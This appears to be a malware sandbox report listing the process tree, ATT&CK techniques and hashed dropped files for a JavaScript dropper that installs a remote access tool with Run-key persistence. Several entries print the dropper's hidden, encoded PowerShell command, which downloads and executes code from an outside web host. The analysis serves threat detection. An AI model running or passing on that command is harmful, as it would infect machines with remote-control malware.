PID:3896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc16174f50,0x7ffc16174f60,0x7ffc16174f70
  2⤵
  PID:1092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1680 /prefetch:2
  2⤵
  PID:212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2004 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2296 /prefetch:8
  2⤵
  PID:1048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1
  2⤵
  PID:3064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
  2⤵
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3868 /prefetch:8
  2⤵
  PID:2672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4908 /prefetch:8
  2⤵
  PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5036 /prefetch:8
  2⤵
  PID:4876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:4632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3168 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:4344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3652 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2764 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4104 /prefetch:8
  2⤵
  PID:3528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17092933246503164330,8756873966332634625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3680 /prefetch:8
  2⤵
  PID:3116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3720

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3872

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap694:82:7zEvent7494
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4176

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3si135636.js"
1⤵
- Checks computer location settings
PID:952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C pOWershElL -nop -w hiddEN -ep bypasS -eNc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdABoAGUAdgBhAGwAdQBlAG8AZgBhAG0AbwBtAGUAbgB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAvAGkAbQBhAGcAZQBzAC8AIgApAA==
  2⤵
  PID:1084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOWershElL -nop -w hiddEN -ep bypasS -eNc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdABoAGUAdgBhAGwAdQBlAG8AZgBhAG0AbwBtAGUAbgB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAvAGkAbQBhAGcAZQBzAC8AIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
  - - C:\Users\Admin\AppData\Roaming\gjcERQyb\presentationhost.exe
      "C:\Users\Admin\AppData\Roaming\gjcERQyb\presentationhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1072

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\3si135636.js
1⤵
- Opens file in notepad (likely ransom note)
PID:2192

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3si135636.js"
1⤵
- Checks computer location settings
PID:2576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C pOWershElL -nop -w hiddEN -ep bypasS -eNc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdABoAGUAdgBhAGwAdQBlAG8AZgBhAG0AbwBtAGUAbgB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAvAGkAbQBhAGcAZQBzAC8AIgApAA==
  2⤵
  PID:2084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOWershElL -nop -w hiddEN -ep bypasS -eNc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdABoAGUAdgBhAGwAdQBlAG8AZgBhAG0AbwBtAGUAbgB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAvAGkAbQBhAGcAZQBzAC8AIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4736
  - - C:\Users\Admin\AppData\Roaming\dFl2bQZw\presentationhost.exe
      "C:\Users\Admin\AppData\Roaming\dFl2bQZw\presentationhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4176

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
6ff94968c9b650d9f1d7b96e77356885

SHA1
a9d4d926ecc041b7b5d98d6da66e455ebd99390d

SHA256
64cf9f90532e6a7991daacc532bca40f7dff763fbb0c3ddaf418fcfac4ea90a7

SHA512
dd5c2418ac14feaa34cdafe1d4e8f697f03f0b315f882e0c2d0d74cb85d07a1c909a65e9d80cc9d901b7e347de7aaea88be2450ddc2350fb43551cd03df8fcb8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323

Filesize
471B

MD5
3826037172731ac33e566808c9618388

SHA1
226e9205194fb0446af7fef47c68749add90d966

SHA256
692f1898c2850d619cb42a23932602bc680abe6634e2b04906304311d2eccf27

SHA512
608c14885ae190b0cf6ca08a277d975bb2fb9ae010305a7b98489dd61daa68797be81927b6c779e4e4f48d629a6804ad10d8b8321200c7c72866c449cee94682

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\69C6F6EC64E114822DF688DC12CDD86C

Filesize
631B

MD5
54f5dac59e9c2be8229dded05837d48b

SHA1
a3a4a2325439daa22af599624c7d07d7eb24391c

SHA256
81d755ca9b28ec7f47d0fd4627c55c42840fa294ab7e9987ef88a5f7b1e15113

SHA512
aa2b6b442f9225b621bc79b92d3fdbb2c4c2ea69dfc9a4325aacda7f384b36984878d4be71e9e556f2a5c36399fc3091509e7d0421b601ad1a381d8a2cba8d7c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3

Filesize
471B

MD5
60862e3cfa179f3df2b96a58912f6787

SHA1
ff537827cbde6445205715d36d3ae25fa1d6430f

SHA256
8d359daecf4a7e4b1816e03d675e0f87ad87f729d9f1c9d0d7ef3598a2cbdf08

SHA512
773013b9c5b236d9431998d8db21119a6b80e7bfdc7fa003471eb81757708efc5cd8ad0e77d822c482d81a53027a5d602947d0981a0e24ec804ecb32b8846aef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
5a11c6099b9e5808dfb08c5c9570c92f

SHA1
e5dc219641146d1839557973f348037fa589fd18

SHA256
91291a5edc4e10a225d3c23265d236ecc74473d9893be5bd07e202d95b3fb172

SHA512
c2435b6619464a14c65ab116ab83a6e0568bdf7abc5e5a5e19f3deaf56c70a46360965da8b60e1256e9c8656aef9751adb9e762731bb8dbab145f1c8224ac8f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
55382dfedb3cd33b2dc6a749093cdb7a

SHA1
c9421276c9dcf72e8f6d2cc8c0bb4a714be76048

SHA256
a2a10f99c91b7c71cfaefa3cda4194009fcce62d187957b09649391792d4516b

SHA512
1cbc1c2768f2b7726e151a604cfd50a1680a93856d2725b9d72c9a2d72927b9a434deb4cbbf98fe4da58a16a9952d047fca8626516e83451cba07960576709c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
b9ddeb5e66bbfa3d00701ad50ac9bed3

SHA1
1ad476d8ad5d8bb672d918c2bfd6092d16037d25

SHA256
e589e02bfafcc6b3ffd254bfd2ca4bc4ee4655ffb0a6ebe7e8ae3f98ef4824eb

SHA512
c10f95dad1d71a444e9db5f96dafbe3bec104cf09813d2d1ee2d99efa28f801d83a5ada436619bb3779cff54c2263e19cb157712250be5986d8a35aea3b10cd4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323

Filesize
414B

MD5
3093c6cc32a7d854bbb27fdba12c310e

SHA1
66b6408569fc416c001f706ba0be87dff0483930

SHA256
b0ef4f1165f035c2ca2af5b71dbcfa65ee5fd1a503c53260139209e5c24661d9

SHA512
1481f8da873df5bb4b4a139e87690746a343690e117de814ff10e44a49b385fdece220ad14f13466a0a9336475f20bb7bb82e1c8fb239d50fb7af801a4d1d6a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12CDD86C

Filesize
240B

MD5
0622b011c3361d02b3a58dd4c26ec580

SHA1
6df517f3a38a3a27fe9e1048834479c801d13081

SHA256
9a55163046047c86a77da4d43c6f4342954d3ce57490113450c5a7f7f85c3574

SHA512
4517762118bd1ab189a1f4f6e18446bef56450f4189034fb8a118b94f59da357d6e2d7b67362c804717195dd6795612d6b4ddcbcc4c842d620fd96dbacbaf5c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3

Filesize
406B

MD5
52e1259e13b5a68a8a768e8ae88b0025

SHA1
ce8677eabba4b5ddedffe099cd7664a99d18cb01

SHA256
7b697f5d36ab31737dddf9cbfa791001b54eefb8ebd85f4ad3f491ab04689171

SHA512
5cd520cf5dc5a224ee78489f82882bd15d2a796c41b1e71ffb15033b13a8d73be7d6e58d323aa72a06f2aa0ea8b7b4646b050c63985133425bf32d02212f3d9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
de7e2727f2a700b1c0b006b7deb193f4

SHA1
a2be9adbe92a9970bb911c0c49e6d7d2be5adb50

SHA256
7f5f4d3bde01ac4987db13c0fd9f6a8d4a197ea66821337f2afe7a4a4412bfc9

SHA512
56684157d92d4ed4969865f6c7e0bb5aee2b4e395526cc775eb6ad5009a70b62dc730d8c4ef4d8bca1fb929b6b4d01ff56dae272706f553479ae803873c7161d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f1b8db5f041dd995c7483afb75791405

SHA1
bc0b2c7934ba97f16f4d05d8ed4d470d6b9d65a7

SHA256
1eb207b0350f8f2762fc1e0b2b99ded90442505440712e53ecad381ac24c41f9

SHA512
772f1030fa7909ab174b4e82d27717943e54773e0d10ba68778dc5d2d5cf577a668f1b6cdb074ac2d609904e6f33f5732d1a419893a9e5085dae2d0136f47568

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\presentationhost.exe

Filesize
109KB

MD5
b2b27ccaded1db8ee341d5bd2c373044

SHA1
1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

SHA256
e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

SHA512
0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

Download Submit
C:\Users\Admin\AppData\Roaming\dFl2bQZw\presentationhost.exe

Filesize
109KB

MD5
b2b27ccaded1db8ee341d5bd2c373044

SHA1
1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

SHA256
e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

SHA512
0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\NSM.LIC

Filesize
259B

MD5
3a88847f4bbf7199a2161ed963fe88ef

SHA1
8629803adb6af84691dc5431b6590df14bad4a61

SHA256
a680947aba5cf3316be50f1ec6a0d8bf72f7d7ca79d91430c26e24680eddd35e

SHA512
2b6408e7334946655045914b2cfa14dcfb39502f64ffafad784717a8ca036b73928bd7a5b02d650d8698357c54c31cac11a705baed0e1e7a3a07d659a2104e02

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
